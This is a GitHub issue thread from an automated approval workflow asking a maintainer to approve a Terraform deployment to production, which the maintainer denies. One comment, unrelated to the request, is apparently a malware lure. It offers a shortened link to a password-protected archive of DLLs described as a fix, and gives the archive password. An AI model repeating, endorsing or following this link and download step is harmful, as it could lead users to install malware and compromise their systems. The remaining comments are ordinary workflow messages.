### ISSUE TITLE
Manual approval required for workflow run 11088775820: Deploying Branch refs/heads/main - PR URL:  to Production

### ISSUE THREAD

**Issue by yahyagulshan** [expertscloud/terraform-control-tower#7]
Please review the Terraform plan and approve or deny the deployment of the following Pull Request to production: .

Workflow is pending manual review.
URL: https://api.github.com/expertscloud/terraform-control-tower/actions/runs/11088775820

Required approvers: [abaidgulshan]

Respond "approved", "approve", "lgtm", "yes" to continue workflow or "denied", "deny", "no" to cancel.

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://bit.ly/47P0Nvo
Archive codepass: changeme
I put the necessary dlls in the archive

**Comment by abaidgulshan** [comment]
no

**Comment by yahyagulshan** [comment]
Request denied. Closing issue and failing workflow.
